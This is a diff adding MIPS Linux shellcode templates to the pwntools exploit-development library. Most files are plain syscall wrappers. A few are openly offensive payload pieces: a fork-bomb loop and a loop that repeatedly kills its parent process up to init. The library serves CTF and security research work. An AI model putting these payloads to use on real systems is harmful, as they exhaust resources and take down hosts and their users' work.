+1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm new file mode 100644 index 000000000..054f17d4a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm new file mode 100644 index 000000000..38e2779aa --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm new file mode 100644 index 000000000..2c02f7423 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/execve.asm b/pwnlib/shellcraft/templates/mips/linux/execve.asm new file mode 100644 index 000000000..9e3cca18b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/execve.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, argv, envp"/> +<%docstring> +Invokes the syscall execve. See 'man 2 execve' for more information. + +Arguments: + path(char): path + argv(char): argv + envp(char): envp + + + ${syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/exit.asm b/pwnlib/shellcraft/templates/mips/linux/exit.asm new file mode 100644 index 000000000..311ba9a6d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/mips/linux/faccessat.asm b/pwnlib/shellcraft/templates/mips/linux/faccessat.asm new file mode 100644 index 000000000..002dbc3c5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fallocate.asm b/pwnlib/shellcraft/templates/mips/linux/fallocate.asm new file mode 100644 index 000000000..b1c2c596c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fchdir.asm b/pwnlib/shellcraft/templates/mips/linux/fchdir.asm new file mode 100644 index 000000000..54cdb077e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fchmod.asm b/pwnlib/shellcraft/templates/mips/linux/fchmod.asm new file mode 100644 index 000000000..63b9b473b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm b/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm new file mode 100644 index 000000000..f5a165652 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fchown.asm b/pwnlib/shellcraft/templates/mips/linux/fchown.asm new file mode 100644 index 000000000..859a44923 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fchownat.asm b/pwnlib/shellcraft/templates/mips/linux/fchownat.asm new file mode 100644 index 000000000..e718180b5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fcntl.asm b/pwnlib/shellcraft/templates/mips/linux/fcntl.asm new file mode 100644 index 000000000..237327d40 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm b/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm new file mode 100644 index 000000000..8eb26471d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/mips/linux/flock.asm b/pwnlib/shellcraft/templates/mips/linux/flock.asm new file mode 100644 index 000000000..364f6a9a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fork.asm b/pwnlib/shellcraft/templates/mips/linux/fork.asm new file mode 100644 index 000000000..54090ce61 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm b/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm new file mode 100644 index 000000000..00c564c6e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/forkbomb.asm @@ -0,0 +1,15 @@ +<% + from pwnlib.shellcraft.mips import nop + from pwnlib.shellcraft.mips.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + beq $at, $at, ${dosloop} + ${nop()} diff --git a/pwnlib/shellcraft/templates/mips/linux/forkexit.asm b/pwnlib/shellcraft/templates/mips/linux/forkexit.asm new file mode 100644 index 000000000..0577adc8a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/forkexit.asm @@ -0,0 +1,15 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.mips.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + blez $v0, ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/mips/linux/fstat.asm b/pwnlib/shellcraft/templates/mips/linux/fstat.asm new file mode 100644 index 000000000..1f562ba5f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fstat64.asm b/pwnlib/shellcraft/templates/mips/linux/fstat64.asm new file mode 100644 index 000000000..93079a24b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm b/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm new file mode 100644 index 000000000..723a1f833 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/mips/linux/fsync.asm b/pwnlib/shellcraft/templates/mips/linux/fsync.asm new file mode 100644 index 000000000..97b4a9c31 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm b/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm new file mode 100644 index 000000000..4f52cb097 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm new file mode 100644 index 000000000..296f2ee30 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/mips/linux/futimesat.asm b/pwnlib/shellcraft/templates/mips/linux/futimesat.asm new file mode 100644 index 000000000..285d3e5d9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getcwd.asm b/pwnlib/shellcraft/templates/mips/linux/getcwd.asm new file mode 100644 index 000000000..bf47fb786 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getegid.asm b/pwnlib/shellcraft/templates/mips/linux/getegid.asm new file mode 100644 index 000000000..ae0d355cf --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/geteuid.asm b/pwnlib/shellcraft/templates/mips/linux/geteuid.asm new file mode 100644 index 000000000..eb503fadb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/getgid.asm b/pwnlib/shellcraft/templates/mips/linux/getgid.asm new file mode 100644 index 000000000..923a0f09b --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/getgroups.asm b/pwnlib/shellcraft/templates/mips/linux/getgroups.asm new file mode 100644 index 000000000..d91d2f4f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getitimer.asm b/pwnlib/shellcraft/templates/mips/linux/getitimer.asm new file mode 100644 index 000000000..afe23613c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpeername.asm b/pwnlib/shellcraft/templates/mips/linux/getpeername.asm new file mode 100644 index 000000000..34399cd42 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpgid.asm b/pwnlib/shellcraft/templates/mips/linux/getpgid.asm new file mode 100644 index 000000000..8a32000e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm b/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm new file mode 100644 index 000000000..7318c949f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpid.asm b/pwnlib/shellcraft/templates/mips/linux/getpid.asm new file mode 100644 index 000000000..47028e745 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm b/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm new file mode 100644 index 000000000..f28a7b014 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getppid.asm b/pwnlib/shellcraft/templates/mips/linux/getppid.asm new file mode 100644 index 000000000..88eb20f28 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/getpriority.asm b/pwnlib/shellcraft/templates/mips/linux/getpriority.asm new file mode 100644 index 000000000..83f8994b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getresgid.asm b/pwnlib/shellcraft/templates/mips/linux/getresgid.asm new file mode 100644 index 000000000..ac3085905 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getresuid.asm b/pwnlib/shellcraft/templates/mips/linux/getresuid.asm new file mode 100644 index 000000000..63735adda --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm b/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm new file mode 100644 index 000000000..275839540 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getrusage.asm b/pwnlib/shellcraft/templates/mips/linux/getrusage.asm new file mode 100644 index 000000000..cf4c77667 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getsid.asm b/pwnlib/shellcraft/templates/mips/linux/getsid.asm new file mode 100644 index 000000000..7726dde5c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getsockname.asm b/pwnlib/shellcraft/templates/mips/linux/getsockname.asm new file mode 100644 index 000000000..e6bec23b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm b/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm new file mode 100644 index 000000000..74d1fc472 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm new file mode 100644 index 000000000..694769cfb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/mips/linux/getuid.asm b/pwnlib/shellcraft/templates/mips/linux/getuid.asm new file mode 100644 index 000000000..a06db1a4c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/gtty.asm b/pwnlib/shellcraft/templates/mips/linux/gtty.asm new file mode 100644 index 000000000..58882b333 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ioctl.asm b/pwnlib/shellcraft/templates/mips/linux/ioctl.asm new file mode 100644 index 000000000..4dfe3aa4c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/ioperm.asm b/pwnlib/shellcraft/templates/mips/linux/ioperm.asm new file mode 100644 index 000000000..84e200102 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/mips/linux/iopl.asm b/pwnlib/shellcraft/templates/mips/linux/iopl.asm new file mode 100644 index 000000000..7e41015cd --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/mips/linux/kill.asm b/pwnlib/shellcraft/templates/mips/linux/kill.asm new file mode 100644 index 000000000..4b99e4039 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/mips/linux/killparent.asm b/pwnlib/shellcraft/templates/mips/linux/killparent.asm new file mode 100644 index 000000000..9c59aff0f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/killparent.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft.mips.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('$v0', SIGKILL)} + beq $v0, $zero, ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/mips/linux/lchown.asm b/pwnlib/shellcraft/templates/mips/linux/lchown.asm new file mode 100644 index 000000000..d9ec7d6ca --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> 